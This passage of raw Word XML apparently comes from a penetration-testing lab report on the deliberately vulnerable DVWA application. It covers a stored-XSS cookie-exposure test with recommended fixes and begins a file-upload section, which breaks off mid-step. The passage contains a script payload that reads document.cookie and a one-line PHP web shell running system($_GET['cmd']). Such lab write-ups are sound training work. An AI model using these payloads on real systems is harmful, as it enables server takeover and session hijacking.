        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96B26">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Deploy a Web Application Firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC80FFF" w14:textId="77777777" w:rsidR="00B24728" w:rsidRDefault="002B69D6" w:rsidP="00B24728">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>B) Stored Cross-Site Scripting (XSS) — Guestbook Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473FF7A" w14:textId="77777777" w:rsidR="005404AB" w:rsidRDefault="002B69D6" w:rsidP="005404AB">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Demonstrate stored XSS in the DVWA Guestbook page and show how it can be used to hijack session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E13B3F0" w14:textId="77777777" w:rsidR="005404AB" w:rsidRDefault="002B69D6" w:rsidP="005404AB">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4ADCE" w14:textId="77777777" w:rsidR="005404AB" w:rsidRPr="005404AB" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Payload &lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>)&lt;/script&gt; was submitted in the Guestbook form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B940BDC" w14:textId="77777777" w:rsidR="005404AB" w:rsidRPr="005404AB" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Upon reloading the page, the script executed, triggering a JavaScript alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0BAE7" w14:textId="77777777" w:rsidR="005404AB" w:rsidRPr="005404AB" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The alert displayed the PHPSESSID cookie, confirming the session token could be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C597390" w14:textId="3D612477" w:rsidR="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="005404AB">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005404AB">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Key Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A53D9C" w14:textId="77777777" w:rsidR="005404AB" w:rsidRDefault="00B24728" w:rsidP="00E6018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B45DDBF" wp14:editId="4B23B9A9">
            <wp:extent cx="3237341" cy="2234317"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1851529988"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29988" name="Picture 47"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74996" cy="2260306"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB33992" w14:textId="21827362" w:rsidR="002B69D6" w:rsidRPr="007D5ADA" w:rsidRDefault="002B69D6" w:rsidP="00E6018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5ADA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B80ABE" w:rsidRPr="007D5ADA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5ADA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5ADA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious payload submitted in the Guestbook form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB48335" w14:textId="5E7DFC81" w:rsidR="002B69D6" w:rsidRDefault="00B24728" w:rsidP="00E6018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC8B67E" wp14:editId="09F8270D">
            <wp:extent cx="5583080" cy="3514477"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45977140"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7140" name="Picture 48"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97603" cy="3523619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002B69D6" w:rsidRPr="00A60C6C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CB3A9D" w:rsidRPr="00A60C6C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="002B69D6" w:rsidRPr="00A60C6C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002B69D6" w:rsidRPr="00A60C6C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript alert popup triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4FE50" w14:textId="77777777" w:rsidR="00E6018A" w:rsidRDefault="007F0B54" w:rsidP="00E6018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B404FD6" wp14:editId="0B280586">
            <wp:extent cx="5518205" cy="3698259"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="961722985"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22985" name="Picture 49"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20847" cy="3700030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A7B1E" w14:textId="0D8C7282" w:rsidR="002B69D6" w:rsidRPr="00E31D51" w:rsidRDefault="002B69D6" w:rsidP="00E6018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31D51">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="008D3B9F" w:rsidRPr="00E31D51">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00E31D51">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E31D51">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie value revealed in the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F21945" w14:textId="77777777" w:rsidR="002B69D6" w:rsidRPr="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="002B69D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Stored XSS allowed persistent malicious scripts to execute whenever the page was accessed, enabling attackers to steal cookies or perform session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D85BA5" w14:textId="77777777" w:rsidR="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="002B69D6">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C96EEA" w14:textId="77777777" w:rsidR="002B69D6" w:rsidRPr="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Sanitize all user input before storing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C815AF1" w14:textId="77777777" w:rsidR="002B69D6" w:rsidRPr="002B69D6" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Apply output encoding on rendered data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD1735" w14:textId="3878B430" w:rsidR="00E96B26" w:rsidRDefault="002B69D6" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B69D6">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies to protect sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1C809" w14:textId="77777777" w:rsidR="007E1843" w:rsidRPr="007A592E" w:rsidRDefault="007E1843" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A592E">
        <w:t>Enforce a strict Content Security Policy (CSP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41631322" w14:textId="1E948413" w:rsidR="007E1843" w:rsidRPr="007E1843" w:rsidRDefault="007E1843" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A592E">
        <w:t>Enable WAF rules for XSS filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56036917" w14:textId="77777777" w:rsidR="003F20A3" w:rsidRDefault="00AC1034" w:rsidP="00AC1034">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>C) Unrestricted File Upload — Remote Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D682FE2" w14:textId="5BE38007" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00AC1034">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>DVWA’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> file upload functionality to achieve remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4101A8EC" w14:textId="2BB22C76" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00AC1034">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA4BEF" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>A simple PHP shell (&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> system($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;) was created and saved as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410006BC" w14:textId="77777777" w:rsidR="00AC1034" w:rsidRPr="00AC1034" w:rsidRDefault="00AC1034" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1034">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">The file was uploaded via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC1034">
